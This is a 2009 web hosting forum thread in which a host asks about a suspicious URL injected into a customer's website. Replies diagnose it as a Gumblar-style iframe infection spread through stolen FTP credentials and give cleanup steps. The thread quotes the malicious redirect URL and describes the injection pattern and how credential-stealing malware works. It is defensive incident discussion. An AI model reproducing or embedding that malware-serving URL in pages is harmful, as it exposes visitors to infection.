Results 1 to 14 of 14
Thread: weird line in customer website
-
07-20-2009, 05:33 PM #1Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,682
weird line in customer website
Today a customer send me an email stating that this line
appeared in the html code of his website.
http://u0r.in:8080/ts/in.cgi?pepsi106
What is it? Is it a virus? a Trojan?
-
07-20-2009, 05:43 PM #2Web Hosting Guru
- Join Date
- May 2008
- Posts
- 340
I don't see the line you're referring to. When the URL is accessed it's redirecting to http://u7x.in:8080/index.php
Can you paste the contents of the script so that everyone can check it ?Twitter : http://twitter.com/eth1networks
Contact Us : support[at]eth1.in
-
07-20-2009, 05:47 PM #3Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,682
The website was corrected and the line removed....
BTW, I found several references to that line in google
http://tinyurl.com/npn2rl
-
07-20-2009, 05:48 PM #4Junior Guru
- Join Date
- May 2009
- Location
- On a Speck!!!!!
- Posts
- 216
I just see a white page. Can you paste the code here?
-
07-20-2009, 05:52 PM #5Web Hosting Guru
- Join Date
- May 2008
- Posts
- 340
Just for clarification, the URL http://u0r.in:8080/ts/in.cgi?pepsi106 was included in the code ?
Can you post the file ownership and permissions of the affected file ?Twitter : http://twitter.com/eth1networks
Contact Us : support[at]eth1.in
-
07-20-2009, 11:06 PM #6WHT Addict
- Join Date
- Apr 2003
- Location
- Earth
- Posts
- 156
Sounds like Gumblar.. change all passwords and virus/malware scan any machine that has accessed that account. Sounds like your customers machine is infected.
-
07-21-2009, 02:40 AM #7Disabled
- Join Date
- Jun 2009
- Posts
- 126
Its seems to be an issue will a attack on the customers account due to insecure permissions.
Similar ti iframe attacks.
-
07-21-2009, 02:46 AM #8Web Hosting Master
- Join Date
- Aug 2004
- Location
- Canada
- Posts
- 3,785
█ Tony B. - Chief Executive Officer
█ Hawk Host Inc. Proudly serving websites since 2004
█ Quality Shared and Cloud Hosting
█ PHP 5.2.x - PHP 8.1.X Support!
-
07-21-2009, 03:35 AM #9PING PONG
- Join Date
- May 2009
- Location
- SLASH ROOT
- Posts
- 867
Mostly it happens over FTP.
Check the FTP logs to find the source of injection. If you are using Active FTP change to Passive.
Active is more vulnerable to data sniffing since it uses standard port for communication. Don't store FTP passwords in FTP clients.
P.S: Also do set complex passwords for the accounts.█ WebHostRepo.com
█ Linux | Windows | VPS | Cloud
█ Outsourced Technical Support since 2009
█ sales@webhostrepo.com
-
07-21-2009, 03:33 PM #10Junior Guru
- Join Date
- Oct 2008
- Location
- Chicago, IL
- Posts
- 222
It's not gumblar but it does happen the same way as gumblar and martuz - compromised FTP credentials.
One of the PCs that has FTP access to that site is infected. I know, everyone has an anti-virus program, but many AV companies were getting hit with so many new variants that they started using generic signatures. (Check out Commtouch's new report)
This opened the door to new viruses that were clever enough to evade detection.
These new virus strains work in one of three ways; they know where the username and passwords are stored in files for popular FTP programs, they use keyboard loggers and they also sniff FTP traffic. Since FTP transmits all data, including username and passwords, in plain text, sniffing for login credentials in an FTP stream is quite easy.
The "pepsi" and "cocacola" iframes are the new gumblar and martuz infections.
All PCs with FTP access to that site have to be scanned and cleaned with a new anti-virus program - one different from what's installed now because obviously the virus knows how to evade detection of the current AV.
Then, and only then, can the FTP passwords be changed and then have the sites files all scanned or just replaced with a known good back-up.Thomas J. Raef
WeWatchYourWebsite - so you don't have to!
-
08-18-2009, 03:21 AM #11Disabled
- Join Date
- Aug 2009
- Posts
- 5
any one have doubt that it can be a virus or anything else ?
-
08-18-2009, 03:35 AM #12New Member
- Join Date
- Dec 2005
- Location
- Istanbul / Turkiye
- Posts
- 3
-
08-18-2009, 04:12 AM #13Aspiring Evangelist
- Join Date
- Sep 2007
- Posts
- 369
-
08-18-2009, 04:22 AM #14Junior Guru
- Join Date
- Oct 2008
- Location
- Chicago, IL
- Posts
- 222
You should probably start a new thread for this. Your customer's website has been infected.
These types of infections (3 character domain, then the TLD of either: ru, hk, in or tw, followed by :8080 and some string) have usually been the result of compromised FTP credentials.
Your customer should have everyone with FTP access to their (including you if you have FTP access to their site) install a new anti-virus program and scan and clean every PC with FTP access to that site.
The reason is, that the virus that steals the FTP credentials, already knows how to evade detection of the currently installed anti-virus program so you need to use something different. If you don't do this, your customer's site will just get hacked again and again.
After cleaning all PCs with FTP access, you must change all FTP passwords.
Then you can either restore the site with a known, clean version, or download the entire site to a newly cleaned PC, scan all the files for the above line (it will appear in iframe tags) and remove the malscript.
These steps must be followed in the order listed. Otherwise your customer will just get hacked again.Thomas J. Raef
WeWatchYourWebsite - so you don't have to!
Similar Threads
-
Weird Website
By mgphoto in forum Web Hosting LoungeReplies: 25Last Post: 07-29-2009, 08:05 AM -
how do you analyize the guest on your website on line?
By baabb in forum Running a Web Hosting BusinessReplies: 6Last Post: 06-05-2006, 05:33 PM -
Weird email from customer
By EuroVPS/Director in forum Web HostingReplies: 18Last Post: 05-29-2005, 04:50 PM -
Merchant Accounts, off-line customer control software, accountance software.
By Novice2k in forum Hosting Software and Control PanelsReplies: 0Last Post: 08-02-2003, 04:39 AM -
how to make my website able to accept payments on line?
By leah in forum Web HostingReplies: 1Last Post: 09-08-2000, 07:59 PM